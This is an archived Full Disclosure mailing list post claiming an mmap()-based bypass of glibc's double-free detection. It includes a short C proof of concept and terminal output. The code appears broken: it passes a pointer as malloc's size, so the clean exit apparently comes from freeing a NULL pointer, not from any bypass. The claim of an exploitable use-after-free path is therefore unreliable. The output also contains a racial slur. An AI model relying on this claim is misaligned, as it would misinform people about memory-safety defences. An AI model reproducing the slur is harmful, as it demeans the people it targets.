[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CALqV+1R++-UAkc7g1hKW_zqpaRpunQN32pE6eRr9z3Lo_sOsuQ@mail.gmail.com>
Date: Sat, 24 Mar 2018 18:11:52 -0700
From: keliikoa kirland <keliikoakirland@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] new email; gw22067@...mail.com | Double-free segfault bypass
Details from old email:
=========================================
"Double-Free bypass PoC is self-explanatory as well; 2 free's equate to a
double-free heap corruption segfault; using mmap() disables that segfault
and allows more than 1 free on any malloc'd/mmap'd variable. You can free
`x` 4+ times and it'll still exit cleanly. brk() has already been patched;
which is why i put // 1day next to it; same misalignment/technique to
mmap() which is still vuln/can be abused to write use-after-free's without
having the need to bypass heap corruption segfaults." brk() was equal to
mmap() in PoC below; mmap() --> brk() --> free() --> free() --> clean exit;
now just mmap() --> free() --> free()
PoC:
=========================================
joe@...ntu:~$ cat test1.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
int main(void){
void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED |
MAP_ANONYMOUS, 0, 0);
void *z = malloc(p);
free(z);
free(z);
}
joe@...ntu:~$ ./test1
*** Error in `./test1': double free or corruption (top): 0x08332008 ***
Aborted (core dumped)
joe@...ntu:~$ cat test1.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
int main(void){
void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED |
MAP_ANONYMOUS, 0, 0);
p = mmap(0x2000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED |
MAP_ANONYMOUS, 0, 0);
void *z = malloc(p);
free(z);
free(z);
}
joe@...ntu:~$ ./test1
joe@...ntu:~$ bl1ng bl1ng n1gg4z ;PppPpP
References/Credits/Greetz:
=========================================
ac1db1tch3z koa
https://github.com/x0r1
http://steamcommunity.com/profiles/76561198333157214/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists